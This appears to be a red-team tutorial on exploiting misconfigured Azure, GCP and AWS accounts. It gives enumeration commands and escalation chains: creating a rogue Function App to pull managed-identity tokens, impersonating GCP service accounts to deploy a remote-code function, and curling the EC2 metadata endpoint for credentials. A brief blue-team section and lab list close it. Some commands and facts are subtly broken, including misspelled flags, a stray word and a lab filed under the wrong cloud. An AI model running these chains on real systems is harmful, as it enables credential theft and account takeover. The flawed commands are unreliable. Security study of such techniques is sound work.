Exploiting Misconfigurations in Azure AWS, and GCP

The Cloud as a Primary Attack Surface

The pivot to cloud infrastructure has fundamentally reshaped the adversarial landscape. Enterprises leveraging Azure and Google Cloud Platform (GCP) often underestimate the complexity of securing distributed identities, role-based access controls (RBAC), and resource provisioning models. This introduces a misconfiguration that red teams can weaponize to escalate privileges, exfiltrate sensitive data, or achieve persistent access.

Reconnaissance and Enumeration

Azure:

Credentialed Access (via Az CLI):

az login # Auth with user or service principal.
az acount list # Enumerate subscriptions.
az ad user list # Dump AD users.
az role assignment list # Identify excessive privileges.
az ad sp list --show-mine # Shows accessible service principals
az storage account list # Discover blob containers and their access levels

MicroBurst (PowerShell)

Invoke-EnumerateAzureBlobs -Verbose
Invoke-EnumerateAzureSubDomains -Verbose
Get-AzurePasswords -Verbose

Google Cloud Platform (GCP):

Enumeration with gcloud CLI:

gcloud auth login
gcloud projects list
gcloud iam roles list --project=<project-id>
gcloud iam service-accounts list
gcloud projects get-iam-policy <project-id>

CloudFox Sample Command:

cloudfox gcp -p <project-id> --all

CloudFox IAM mapping visualization

AWS (Amazon Web Services)

Credentialed Enumeration via AWS CLI:

aws sts get-caller-identity
aws iam list-users
aws iam list-roles
aws iam list-policies -scope Local
aws s3 ls

Tools: enumerate-iam, Pacu, CloudSploit, ScoutSuite, awscli

High Impact Misconfigurations in GCP, AWS, and Azure

Misconfigurations typically arise due to over-permissive IAM policies, improper exposure of public resources, and ignorance of internal privilege boundaries.

Azure Misconfigurations

Misconfigurations, Attack Vector & Impact:

• Contributor Role on Subscription: Allows resource creation including Function Apps and Key Vault abuse.

• Public Storage Containers: Permits unauthenticated access, data leakage, or malware hosting.

• Exposed Service Principal Credentials: Hardcoded or leaked secrets reused to impersonate privileged services.

• App Registration Token Disclosure: Tokens exposed in logs or repository; escalated Graph API access or identity impersonation.

Tools: MicroBurst, StormSpotter, ADDInternals, Az CLI

GCP Misconfigurations

Misconfigurations, Attack Vector & Impact:

• Public GCS Buckets: Threat actors can list, download, or overwrite sensitive content.

• Metadata API Exposure on Compute Instances: Credential harvesting via <IP>; enables lateral movement.

• Editor/Owner IAM Roles: Complete project takeover; excessive default access. yei

• Function Deployment Rights: Allows attackers to deploy backdoored Cloud Functions with persistence.

Tools: gcloud, CloudFox, GCPBuckeBrute, Pacu

AWS Misconfigurations

Misconfigurations, Attack Vector & Impact:

• IAM Policy Wildcards (e.g., “Action”:”*”): Grants unrestricted access to services, enabling privilege escalation

• Public S3 Buckets: Leads to data leakage or malware hosting in storage

• Over-Privileged Lambda Functions: Lambda with broad IAM can invoke other services or modify resources.

• EC2 Metadata Service Abuse: Unrestricted access to 169.254.169.254 yields AWS temporary credentials for privilege escalation

• Misconfigured AssumeRole Policies: Cross-account or unintended role escalation via AWS STS AssumeRole

Tools: enumerate-iam, CloudSploit, Pacu, ScoutSuite, AWSBucketDump

Privilege Escalation and Lateral Movement

Azure Escalation Chain Example:

az functionapp create --name evilapp --resource-group rg1 --storage-account mystorage
curl -H Metadata:true "http://localhost:8080/msi/token?resource=https://graph.microsoft.com"
curl -X GET -H "Authorization: Bearer <access_token>" https://graph.microsoft.com/v1.0/users

GCP Escalation Chain Example:

gcloud auth activate-service-account --key-file=creds.json
gcloud iam service-accounts impersonate --target-service-account elevated@project.iam.gserviceaccount.com
gcloud functions deploy rcefunc --runtime python39 --trigger-http --entry-point=main

AWS Escalation Chain Example:

# Access metadata from EC2 instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Use harvested creds to escalate via STS
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name <extracted-user>

Hands-On Labs and Simulations

Azure Labs

• HTB → Ready

• CloudGoat Azure

• Azurite + Local MSI Emulation

GCP Labs

• Flaws.cloud (GCP)

• CloudGoat GCP Fork

• Pacu Lab Scripts

AWS Labs

• CloudGoat AWS

• Flaws2.cloud

• Pacu + LocalStack

• Terraform AWS IAM Playground

Blue Team Countermeasures

Cloud Platform and Defensive Measures

• Azure: Monitor Function App logs; enforce RBAC and minimal app scopes.

• GCP: Audit IAM bindings; block metadata access from exposed services.

• AWS: Restrict IAM wildcards; monitor STS use and EC2 metadata logs.

Tools: ScoutSuite, Prowler, Security Hub, CloudSploit, AWS Config

Final Thoughts

Cloud security is a lattice of privilege inheritance, implicit trust, and user error. Red teams must embrace cloud-native tactics that move laterally across identity providers, abuse role assumptions, and persist in serverless environments.

In 2025, the most dangerous cloud exploit isn’t a vulnerability, it’s a misconfigured role you forgot existed.